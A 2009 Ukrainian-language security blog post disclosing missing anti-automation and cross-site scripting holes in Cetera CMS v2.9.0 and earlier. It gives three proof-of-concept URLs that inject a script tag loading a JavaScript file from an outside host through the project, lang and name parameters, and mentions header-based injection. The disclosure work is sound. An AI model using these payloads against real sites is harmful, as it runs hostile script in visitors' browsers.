Websecurity - Веб безпека

29.10.2009

У березні, 01.03.2009, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі Cetera CMS. Які виявив на офіційному сайті системи http://www.cetera.ru.

Раніше я вже писав про уразливість в Cetera CMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

16.12.2009

Insufficient Anti-automation:

http://site/support/default.php?project=1

Відсутній захист від автоматизованих запитів (капча).

XSS:

http://site/support/default.php?project=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E
http://site/support/default.php?project=1&lang=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E
http://site/support/default.php?project=1&name=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E

Та через заголовки User-Agent, Accept-Language та Referer:

Уразливі Cetera CMS v2.9.0 та попередні версії. Розробники в себе на сайті на Cetera CMS виправили XSS уразливості, але не виправили Insufficient Anti-automation.

This entry was posted on 22:41 16.12.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.